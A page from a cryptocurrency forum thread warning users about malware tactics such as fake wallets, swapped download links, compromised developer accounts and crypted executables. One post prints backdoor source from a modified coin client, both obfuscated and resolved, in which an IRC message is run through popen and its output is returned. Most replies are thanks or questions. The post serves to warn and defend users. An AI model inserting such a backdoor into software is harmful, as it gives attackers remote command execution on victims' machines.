Pages:
Author

Topic: Beware of Increasingly Sophisticated Malware Infection Attempts - page 28. (Read 704286 times)

newbie
Activity: 9
Merit: 0
Thank you  for sharing!  Smiley
newbie
Activity: 4
Merit: 0
Thanks for sharing!
member
Activity: 602
Merit: 13
Then how people not IT knowledgeable like me detect any fake coin with malware wallet?

Any advise?
newbie
Activity: 20
Merit: 0
Malware is a business for some people. From that perspective We should change our mind set. Do our best protect our interest. in our part we should increase our level of knowledge on how to fight the malware.

Never forget that if you're not paying for the product, you ARE the product.
member
Activity: 505
Merit: 35
Increasing malware infection is very unfortunate experience. But based on my experience everyone of us need to understand why are they're flourish even though We secure our system. Malware is a business for some people. From that perspective We should change our mind set. Do our best protect our interest. in our part we should increase our level of knowledge on how to fight the malware.
jr. member
Activity: 130
Merit: 5
In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.

Hi there, I would like to ask if is safe to use incognito mode in goggle chrome. Or do I need to install software application that blocks the malware. Thanks in advance.
member
Activity: 616
Merit: 10
Can you please explain how to protect yourself from attacks? Can I put Linux and not survive? or is there a threat anyway?
member
Activity: 392
Merit: 20
Thanks for the info...I hope this forum will help me to save my money from scammers. Experience unfortunately was sad already.
newbie
Activity: 84
Merit: 0
Thanks for the sharing. I will be more secured from now and then.
member
Activity: 117
Merit: 10
For this reason a love Bitcointalk.org. Thank you!!
newbie
Activity: 98
Merit: 0
Thanks for the info
jr. member
Activity: 644
Merit: 1
It is dangerous even for sites to go, not to mention the downloads )))
member
Activity: 294
Merit: 10
a really good topic, often people start to think about the safety of their wallets when it's too late
member
Activity: 373
Merit: 11
CryptoRex
Thank for the information. So many way that hackers are trying to steal our money. I will post and share this information to help others in the community stay safe while trading or online.
newbie
Activity: 30
Merit: 0
full member
Activity: 128
Merit: 100
Are you telling us that on bitcointalk.org we are likely to infect our computer by click on some link???

That is outrageous, if the community members can't be protected maybe this forum should be shut down.

I had 113,026 ARDR worth about $209,000 stolen yesterday in this way.  Hackers wallet address  ARDOR-HKCS-V6N8-FH7T-A3SLF
newbie
Activity: 3
Merit: 0
Thanks this was very informative. I guess this forum is a big target for malware developers who want to steal easy crypto money.
Yeah very useful forum thanks to all of you..greetings from venezuela.
newbie
Activity: 1
Merit: 0
full member
Activity: 420
Merit: 100
hacked wallet and took all tokens(((((now I sit and think what we've done wrong)thanks for the great article!!!
member
Activity: 328
Merit: 39
This is bad, but this kind of information are precious and I think that the sharing of useful hints should be the main aim of this forum.
So, thank you very much for your advice.
Pages:
Jump to: